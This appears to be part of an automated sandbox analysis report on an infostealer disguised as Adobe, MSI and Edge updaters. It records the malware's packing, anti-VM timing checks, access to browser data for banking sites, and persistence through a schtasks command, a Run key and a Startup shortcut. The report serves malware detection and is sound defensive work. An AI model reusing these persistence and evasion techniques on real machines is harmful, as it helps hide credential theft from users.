            Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: vaultcli.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: linkinfo.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: ntshrui.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: cscapi.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: d2d1.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
            Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeSection loaded: apphelp.dll
            Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeSection loaded: windows.storage.dll
            Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeSection loaded: wldp.dll
            Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exeSection loaded: apphelp.dll
            Source: EdgeMS2.lnk.0.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: file.exeStatic file information: File size 8778752 > 1048576
            Source: file.exeStatic PE information: Raw size of .vmpY[. is bigger than: 0x100000 < 0x838200

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeUnpacked PE file: 7.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeUnpacked PE file: 8.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exeUnpacked PE file: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeUnpacked PE file: 14.2.oobeldr.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exeUnpacked PE file: 17.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exeUnpacked PE file: 18.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exeUnpacked PE file: 19.2.EdgeMS2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D4C990 SetThreadExecutionState,SetThreadExecutionState,GetVersion,GetCurrentThreadId,GetThreadDesktop,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GdiplusStartup,CreateThread,CloseHandle,
            Source: initial sampleStatic PE information: section where entry point is pointing to: .vmpY[.
            Source: file.exeStatic PE information: section name: .vmp#+
            Source: file.exeStatic PE information: section name: .vmp#+
            Source: file.exeStatic PE information: section name: .vmp#+
            Source: file.exeStatic PE information: section name: .vmpY[.
            Source: file.exeStatic PE information: section name: .vmpY[.
            Source: l2[1].exe.0.drStatic PE information: section name: .MPRESS1
            Source: l2[1].exe.0.drStatic PE information: section name: .MPRESS2
            Source: llmcrdwzLnNKYB4T0Vnw.exe.0.drStatic PE information: section name: .MPRESS1
            Source: llmcrdwzLnNKYB4T0Vnw.exe.0.drStatic PE information: section name: .MPRESS2
            Source: AdobeUpdaterV2.exe.0.drStatic PE information: section name: .MPRESS1
            Source: AdobeUpdaterV2.exe.0.drStatic PE information: section name: .MPRESS2
            Source: MSIUpdaterV2.exe.0.drStatic PE information: section name: .MPRESS1
            Source: MSIUpdaterV2.exe.0.drStatic PE information: section name: .MPRESS2
            Source: EdgeMS2.exe.0.drStatic PE information: section name: .MPRESS1
            Source: EdgeMS2.exe.0.drStatic PE information: section name: .MPRESS2
            Source: oobeldr.exe.9.drStatic PE information: section name: .MPRESS1
            Source: oobeldr.exe.9.drStatic PE information: section name: .MPRESS2
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D8C245 push esi; ret
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D8CE63 push es; iretd
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D68F27 push es; ret
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D65B83 push ecx; ret
            Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeCode function: 7_2_006D50A5 push ebp; ret
            Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe (copy)
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exeJump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeJump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeJump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exeJump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exeJump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnkJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26Jump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26Jump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Overwrites code with unconditional jumps - possibly settings hooks in foreign process
            Source: C:\Users\user\Desktop\file.exeMemory written: PID: 4112 base: 15F0005 value: E9 8B 2F 90 75
            Source: C:\Users\user\Desktop\file.exeMemory written: PID: 4112 base: 76EF2F90 value: E9 7A D0 6F 8A
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D57890 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
            Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFE543 second address: EFE547 instructions: 0x00000000 rdtsc 0x00000002 not cl 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 3658
            Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 493
            Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 5011
            Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeWindow / User API: threadDelayed 9995
            Source: C:\Users\user\Desktop\file.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
            Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
            Source: C:\Users\user\Desktop\file.exeAPI coverage: 8.9 %
            Source: C:\Users\user\Desktop\file.exe TID: 3424Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\Desktop\file.exe TID: 1480Thread sleep time: -693000s >= -30000s
            Source: C:\Users\user\Desktop\file.exe TID: 3424Thread sleep time: -3661658s >= -30000s
            Source: C:\Users\user\Desktop\file.exe TID: 1480Thread sleep time: -1479000s >= -30000s
            Source: C:\Users\user\Desktop\file.exe TID: 3424Thread sleep time: -5016011s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 3504Thread sleep count: 9995 > 30
            Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 3504Thread sleep time: -2248875s >= -30000s
            Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D2B2C0 FindFirstFileA,CreateDirectoryA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,GetLastError,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D62EAD GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D7CCFD FindFirstFileExW,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D2BAC0 FindFirstFileA,SetFileAttributesA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D86276 VirtualQuery,GetSystemInfo,
            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 30000
            Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: formVMware20,11696428655
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .utiitsl.comVMware20,1169642865
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: global block list test formVMware20,11696428655
            Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ccount.microsoft.com/profileVMware20,11696428655u
            Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,116x
            Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CT service, encrypted_token FROM token_servicerr global passwords blocklistVMware20,11696428655
            Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696
            Source: file.exe, 00000000.00000003.2037044301.00000000016B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696428
            Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,1169642865
            Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r global passwords blocklistVMware20,11696428655
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: file.exe, 00000000.00000003.3698690548.00000000064C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: file.exe, 00000000.00000003.3698791395.0000000001714000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_D59C8AA1Ee
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ebrokers.co.inVMware20,11696428655d
            Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nickname.utiitsl.comVMware20,1169642865
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: file.exe, 00000000.00000003.3698791395.0000000001714000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_D59C8AA1
            Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ra Change Transaction PasswordVMware20,11696428655
            Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696P
            Source: file.exeBinary or memory string: :sqEMu
            Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o.inVMware20,11696428655~
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: discord.comVMware20,11696428655f
            Source: file.exe, 00000000.00000003.2037044301.00000000016B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HARtive Brokers - non-EU EuropeVMware20,11696428655
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: file.exe, 00000000.00000002.4445088347.0000000006456000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}gramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsE
            Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: comVMware20,11696428655o
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rootpagecomVMware20,11696428655o
            Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s.portal.azure.comVMware20,11696428655
            Source: file.exe, 00000000.00000002.4445088347.0000000006430000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pageformVMware20,11696428655
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tive Brokers - non-EU EuropeVMware20,11696428655
            Source: file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}AW.EXE;MMC.EXE;MSHTA.EXE;RUNDLL32.EXE;WINHLP32.EXE;4DX-
            Source: file.exe, 00000000.00000002.4443887762.000000000169D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
            Source: GNGpmTFam5reWeb Data.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: file.exe, 00000000.00000002.4443887762.0000000001699000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: billing_address_id.comVMware20,11696428
            Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D61780 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D4C990 SetThreadExecutionState,SetThreadExecutionState,GetVersion,GetCurrentThreadId,GetThreadDesktop,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GdiplusStartup,CreateThread,CloseHandle,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D576E0 GetProcessHeap,HeapFree,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D662B6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D66014 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D6FC07 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe "C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe"
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D65D6C cpuid
            Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
            Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,
